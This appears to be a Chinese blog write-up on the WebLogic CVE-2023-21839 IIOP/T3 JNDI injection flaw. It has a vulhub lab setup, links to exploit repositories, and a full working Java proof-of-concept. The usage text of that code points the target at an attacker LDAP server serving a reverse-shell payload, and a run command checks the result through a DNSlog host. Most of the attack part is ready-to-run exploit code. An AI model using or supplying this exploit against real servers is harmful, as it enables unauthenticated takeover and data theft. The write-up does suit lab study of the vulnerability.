由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839
git clone https://github.com/vulhub/vulhub.git
docker-compose up -d
https://github.com/DXask88MA/Weblogic-CVE-2023-21839
选择的sink点在
weblogic.deployment.jms.ForeignOpaqueReference.class
也可以选择使用4ra1n师傅用go模拟数据包的的工具:
https://github.com/4ra1n/CVE-2023-21839
选择的sink点在
weblogic.jndi.internal.ForeignOpaqueReference.class
POC:
import javax.naming.Context; import javax.naming.InitialContext; import javax.naming.NamingException; import java.lang.reflect.Field; import java.util.Hashtable; import java.util.Random; public class CVE_2023_21839 { static String JNDI_FACTORY="weblogic.jndi.WLInitialContextFactory"; static String HOW_TO_USE="[*]java -jar 目标ip:端口 ldap地址\n e.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111"; private static InitialContext getInitialContext(String url)throws NamingException { Hashtable<String,String> env = new Hashtable<String,String>(); env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY); env.put(Context.PROVIDER_URL, url); return new InitialContext(env); } public static void main(String args[]) throws Exception { if(args.length <2){ System.out.println(HOW_TO_USE); System.exit(0); } String t3Url = args[0]; String ldapUrl = args[1]; InitialContext c=getInitialContext("t3://"+t3Url); Hashtable<String,String> env = new Hashtable<String,String>(); env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory"); weblogic.deployment.jms.ForeignOpaqueReference f=new weblogic.deployment.jms.ForeignOpaqueReference(); Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment"); jndiEnvironment.setAccessible(true); jndiEnvironment.set(f,env); Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName"); remoteJNDIName.setAccessible(true); remoteJNDIName.set(f,ldapUrl); String bindName = new Random(System.currentTimeMillis()).nextLong()+""; try{ c.bind(bindName,f); c.lookup(bindName); }catch(Exception e){ } } }
https://github.com/DXask88MA/Weblogic-CVE-2023-21839/releases/tag/CVE-2023-21839
java -jar Weblogic-CVE-2023-21839.jar 127.0.0.1:7001 ldap://81c95c8f.dns.1433.eu.org/test
查看dnslog,收到请求,漏洞验证成功
参考链接:
北京市 1F
简单直观的事件处置流程会更容易落实,还节省时间。